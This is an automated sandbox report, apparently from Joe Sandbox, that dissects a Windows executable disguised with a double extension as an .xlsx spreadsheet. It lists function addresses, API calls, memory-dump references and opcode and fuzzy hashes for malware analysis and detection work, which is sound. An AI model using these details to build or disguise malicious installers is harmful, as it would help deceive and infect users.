                                                          Function 004041E6 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                          • Instruction ID: 838c4c0eb33ef43ad7257432987c28a2a788b3f909dd0a51a4998ccc95d90969
                                                          • Opcode Fuzzy Hash: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                          • Instruction Fuzzy Hash: 57C09B717443017BDB308B509D49F1777556754B00F1488397700F50E0CA74E452D62D
                                                          Function 0040330F Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                          • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                                          • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                          • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                                          Function 004041CF Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,?,00000001,00403FFB), ref: 004041DD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                                          • Instruction ID: c6b71f3973dfff953bb7db756b4a53cf392e498aed0f9e65811aff82f73edd61
                                                          • Opcode Fuzzy Hash: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                                          • Instruction Fuzzy Hash: 81B09235684200BADA214B00ED09F867A62A768701F008864B300240B0C6B244A2DB19
                                                          Function 004041BC Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • KiUserCallbackDispatcher.NTDLL(?,00403F94), ref: 004041C6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CallbackDispatcherUser
                                                          • String ID:
                                                          • API String ID: 2492992576-0
                                                          • Opcode ID: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                          • Instruction ID: 8b53a25d375a508ca0f68064fdc939b5f25de369c98bd294fc40859475f67141
                                                          • Opcode Fuzzy Hash: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                          • Instruction Fuzzy Hash: 02A01132808000ABCA028BA0EF08C0ABB22BBB8300B008A3AB2008003082320820EB0A
                                                          Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 5231c911f6ab3084dc61dacf490c6499e9f2d5b92fa0196a3b0b3ed156b1a20b
                                                          • Instruction ID: 43bd389e684fdc992c114de42b340604c9c8a7aa9960d5983178e32e9e1c03f3
                                                          • Opcode Fuzzy Hash: 5231c911f6ab3084dc61dacf490c6499e9f2d5b92fa0196a3b0b3ed156b1a20b
                                                          • Instruction Fuzzy Hash: 42D0C9B7B141409BDB50EBB8AE8989B73A8E7913297204C73D942F20A1D178D8029A39

                                                          Non-executed Functions

                                                          Function 00404B6E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404B86
                                                          • GetDlgItem.USER32(?,?), ref: 00404B91
                                                          • GlobalAlloc.KERNEL32(?,?), ref: 00404BDB
                                                          • LoadBitmapW.USER32(0000006E), ref: 00404BEE
                                                          • SetWindowLongW.USER32(?,?,00405166), ref: 00404C07
                                                          • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404C1B
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C2D
                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404C43
                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C4F
                                                          • SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404C61
                                                          • DeleteObject.GDI32(00000000), ref: 00404C64
                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C8F
                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C9B
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D31
                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D5C
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D70
                                                          • GetWindowLongW.USER32(?,?), ref: 00404D9F
                                                          • SetWindowLongW.USER32(?,?,00000000), ref: 00404DAD
                                                          • ShowWindow.USER32(?,00000005), ref: 00404DBE
                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EBB
                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F20
                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00404F35
                                                          • SendMessageW.USER32(?,?,00000000,?), ref: 00404F59
                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F79
                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404F8E
                                                          • GlobalFree.KERNEL32(?), ref: 00404F9E
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405017
                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 004050C0
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004050CF
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004050EF
                                                          • ShowWindow.USER32(?,00000000), ref: 0040513D
                                                          • GetDlgItem.USER32(?,000003FE), ref: 00405148
                                                          • ShowWindow.USER32(00000000), ref: 0040514F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 1638840714-813528018
                                                          • Opcode ID: f32dd1ad4cacf5c9a84244efbfcf101a6acffad7926e6f22680bdd12f93664ba
                                                          • Instruction ID: c838968d9b53d15d037ad3ebbdc97e0e82191de3b695f5e6670933e8e46a19ea
                                                          • Opcode Fuzzy Hash: f32dd1ad4cacf5c9a84244efbfcf101a6acffad7926e6f22680bdd12f93664ba
                                                          • Instruction Fuzzy Hash: E9026EB0A00209EFDB209F94DC85AAE7BB5FB44314F10857AF610BA2E1C7799D42CF58
                                                          Function 00404635 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 265stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404684
                                                          • SetWindowTextW.USER32(00000000,?), ref: 004046AE
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040475F
                                                          • CoTaskMemFree.OLE32(00000000), ref: 0040476A
                                                          • lstrcmpiW.KERNEL32(Call,004226E8,00000000,?,?), ref: 0040479C
                                                          • lstrcatW.KERNEL32(?,Call), ref: 004047A8
                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA
                                                            • Part of subcall function 00405708: GetDlgItemTextW.USER32(?,?,?,004047F1), ref: 0040571B
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 0040623F
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 00406253
                                                            • Part of subcall function 004061DC: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 00406266
                                                          • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487B
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404896
                                                          • SetDlgItemTextW.USER32(00000000,00000400,004206A8), ref: 0040490F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                          • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$Call$&B
                                                          • API String ID: 2246997448-2325876253
                                                          • Opcode ID: 412048f63ccbd6e0220628bf1a6179061b89ed4b5b9cf72557f1d92d188b8240
                                                          • Instruction ID: 6e37369fe6ef7f71d764005b1086c215e28ed7130f32df1ae996be3c53d44702
                                                          • Opcode Fuzzy Hash: 412048f63ccbd6e0220628bf1a6179061b89ed4b5b9cf72557f1d92d188b8240
                                                          • Instruction Fuzzy Hash: A79170F1900219EBDB10AFA1DC85AAF77B8EF85714F10443BF601B62D1D77C9A418B69
                                                          Function 00402770 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          • Opcode ID: 270cfe79e7700546bd1110db50653953e97246535dd0ce6893212cd2a7b1ecea
                                                          • Instruction ID: 2908b39070a7deba1428861388b98b097f8f9174a2682adf846a4f1dff5e2c07
                                                          • Opcode Fuzzy Hash: 270cfe79e7700546bd1110db50653953e97246535dd0ce6893212cd2a7b1ecea
                                                          • Instruction Fuzzy Hash: D5F05EB16101149BCB00DBA4DD499BEB378FF04318F3005BAE151F31D0D6B859409B2A
                                                          Function 00404337 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 207windowstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004043D5
                                                          • GetDlgItem.USER32(?,?), ref: 004043E9
                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404406
                                                          • GetSysColor.USER32(?), ref: 00404417
                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404425
                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404433
                                                          • lstrlenW.KERNEL32(?), ref: 00404438
                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404445
                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040445A
                                                          • GetDlgItem.USER32(?,0000040A), ref: 004044B3
                                                          • SendMessageW.USER32(00000000), ref: 004044BA
                                                          • GetDlgItem.USER32(?,?), ref: 004044E5
                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404528
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00404536
                                                          • SetCursor.USER32(00000000), ref: 00404539
                                                          • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,00000001), ref: 0040454E
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040455A
                                                          • SetCursor.USER32(00000000), ref: 0040455D
                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040458C
                                                          • SendMessageW.USER32(?,00000000,00000000), ref: 0040459E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                          • String ID: Call$N$open
                                                          • API String ID: 3615053054-2563687911
                                                          • Opcode ID: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                          • Instruction ID: 8b9c65ccee0929ae2cd37a550bbe3266d1c56d3aba5277cbe5cc7d17fb3eae84
                                                          • Opcode Fuzzy Hash: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                          • Instruction Fuzzy Hash: 19718FB1A00209FFDB109F60DD85A6A7BA9FB94354F00853AFB01B62D1C778AD51CF99
                                                          Function 00405C66 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136stringmemoryfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C76
                                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C9A
                                                          • GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CA3
                                                            • Part of subcall function 00405B19: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                            • Part of subcall function 00405B19: lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                          • GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405CC0
                                                          • wsprintfA.USER32 ref: 00405CDE
                                                          • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,?,00426588,?,?,?,?,?), ref: 00405D19
                                                          • GlobalAlloc.KERNEL32(?,0000000A), ref: 00405D28
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D60
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DB6
                                                          • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405DC8
                                                          • GlobalFree.KERNEL32(00000000), ref: 00405DCF
                                                          • CloseHandle.KERNEL32(00000000), ref: 00405DD6
                                                            • Part of subcall function 00405BB4: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,80000000,00000003), ref: 00405BB8
                                                            • Part of subcall function 00405BB4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                          • String ID: %ls=%ls$NUL$[Rename]
                                                          • API String ID: 1265525490-899692902
                                                          • Opcode ID: 2bc208171b49c92f6a46eb4eb130c3b065c9cc931763dc7ff993c44723f9a4f8
                                                          • Instruction ID: 10a6a65bcc8db41326b0965a868e5b78be2cc6b43571d182478210b5aa6aebd6
                                                          • Opcode Fuzzy Hash: 2bc208171b49c92f6a46eb4eb130c3b065c9cc931763dc7ff993c44723f9a4f8
                                                          • Instruction Fuzzy Hash: E941FE71604A18BFD2206B61AC4CF6B3A6CEF45714F24443BB901B62D2EA78AD018A7D
                                                          Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextW.USER32(00000000,00428200,000000FF,00000010,?), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
